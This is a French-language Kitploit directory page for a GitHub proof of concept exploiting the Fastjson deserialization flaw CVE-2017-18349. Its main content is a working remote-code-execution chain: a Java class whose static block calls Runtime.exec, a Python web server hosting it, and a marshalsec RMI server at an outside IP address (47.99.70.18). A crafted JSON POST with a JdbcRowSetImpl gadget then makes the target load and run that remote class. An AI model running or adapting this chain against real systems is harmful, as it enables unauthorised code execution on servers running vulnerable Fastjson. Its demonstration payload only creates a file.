Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Fastjson--CVE-2017-18349- — Preuve de concept d'exploitation pour la vulnérabilité de désérialisation Fastjson CVE-2017-18349, démontrant l'exécution de code à distance via une charge utile JSON conçue et un serveur RMI. | Kitploit
Outils/GitHubGitHub/h0cksr/fastjson--cve-2017-18349-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubh0cksr/fastjson--cve-2017-18349-

Fastjson--CVE-2017-18349-

Preuve de concept d'exploitation pour la vulnérabilité de désérialisation Fastjson CVE-2017-18349, démontrant l'exécution de code à distance via une charge utile JSON conçue et un serveur RMI.

Voir le dépôt
22il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Fastjson--CVE-2017-18349-Cancel changes

Après avoir configuré le projet en tant que projet Maven, exécutez (attention, l'utilisation d'une version élevée du JDK peut échouer, il est recommandé d'utiliser la version 1.8.65 du JDK) la fonction main de FastjsondemoApplication.java Fichier TouchFile.java

root@kitploit:~
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
  static {
      try {
          Runtime rt = Runtime.getRuntime();
          String[] commands = {"touch", "/tmp/flag_test"};
          Process pc = rt.exec(commands);
          pc.waitFor();
      } catch (Exception e) {
          // do nothing
      }
  }
}

Ensuite, compilez en fichier class avec javac version 8

root@kitploit:~
javac TouchFile.java

Démarrer un service web avec Python

root@kitploit:~
python -m SimpleHTTPServer 80

Générer un RMIServer avec marshalsec

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://47.99.70.18/#TouchFile" 9999

Modifier le paquet de requête

root@kitploit:~
POST / HTTP/1.1 Host: 127.0.0.1:8080 { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://47.99.70.18:9999/TouchFile", "autoCommit":true } }

Résultat: Image

Télécharger l’outil